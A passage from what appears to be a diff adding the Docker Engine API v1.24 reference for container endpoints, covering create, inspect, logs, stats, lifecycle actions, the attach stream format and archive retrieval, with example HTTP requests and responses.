"StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": "", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": 
"12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" }, + "Links": ["redis3:redis"], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuPercent": 80, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "IOMaximumBandwidth": 0, + "IOMaximumIOps": 0, + "BlkioWeight": 300, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceWriteIOps": [{}], + "MemorySwappiness": 60, + "OomKillDisable": false, + "OomScoreAdj": 500, + "PidMode": "", + "PidsLimit": -1, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Sysctls": { "net.ipv4.ip_forward": "1" }, + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "StorageOpt": {}, + "CgroupParent": "", + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "NetworkingConfig": { + "EndpointsConfig": { + "isolated_nw" : { + "IPAMConfig": { + "IPv4Address":"172.20.30.33", + "IPv6Address":"2001:db8:abcd::3033", + "LinkLocalIPs":["169.254.34.68", "fe80::3468"] + }, + "Links":["container_1", "container_2"], + "Aliases":["server_x", "server_y"] + } + } + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. 
This must be a valid RFC 1123 hostname. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. 
+ + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding + mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuPercent** - An integer value containing the usable percentage of the available CPUs. (Windows daemon only) + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **IOMaximumBandwidth** - Maximum IO absolute rate in terms of bytes per second. + - **IOMaximumIOps** - Maximum IO absolute rate in terms of IOps. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. 
+ - **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of: `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]` + - **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of: `"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]` + - **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of: `"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]` + - **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of: `"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **BlkioDeviceWriteIOps** - Limit write rate (IO per second) to a device in the form of: `"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PidsLimit** - Tune a container's pids limit. Set -1 for unlimited. + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. 
+ - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **UsernsMode** - Sets the usernamespace mode for the container when usernamespace remapping option is enabled. + supported values are: `host`. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to. 
+ - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **Sysctls** - A list of kernel parameters (sysctls) to set in the container, specified as + `{ : }`, for example: + `{ "net.ipv4.ip_forward": "1" }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **StorageOpt**: Storage driver options per container. Options can be passed in the form + `{"size":"120G"}` + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`. + The default is the `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container uses to mount volumes. + - **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. 
+ +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "IOMaximumBandwidth": 0, + "IOMaximumIOps": 0, + "BlkioWeight": 0, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteIOps": [{}], + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuPercent": 80, + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": 
false, + "OomScoreAdj": 500, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "Sysctls": { + "net.ipv4.ip_forward": "1" + }, + "StorageOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": 
"/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Dead": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + } + +**Example request, with size information**: + + GET /v1.24/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. 
+ +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **details** - 1/True/true or 0/False/flase, Show extra details provided to logs. Default `false`. +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. 
+- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
+ +**Example request**: + + GET /v1.24/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "pids_stats": { + "current": 3 + }, + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + 
"system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.24/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. 
+ +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Update a container + +`POST /containers/(id or name)/update` + +Update configuration of one or more containers. 
+ +**Example request**: + + POST /v1.24/containers/e90e34656806/update HTTP/1.1 + Content-Type: application/json + + { + "BlkioWeight": 300, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0", + "Memory": 314572800, + "MemorySwap": 514288000, + "MemoryReservation": 209715200, + "KernelMemory": 52428800, + "RestartPolicy": { + "MaximumRetryCount": 4, + "Name": "on-failure" + }, + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Warnings": [] + } + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.24/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST 
/v1.24/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **409** - container is paused +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). 
+ +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.24/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. 
+ +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.24/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.24/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). 
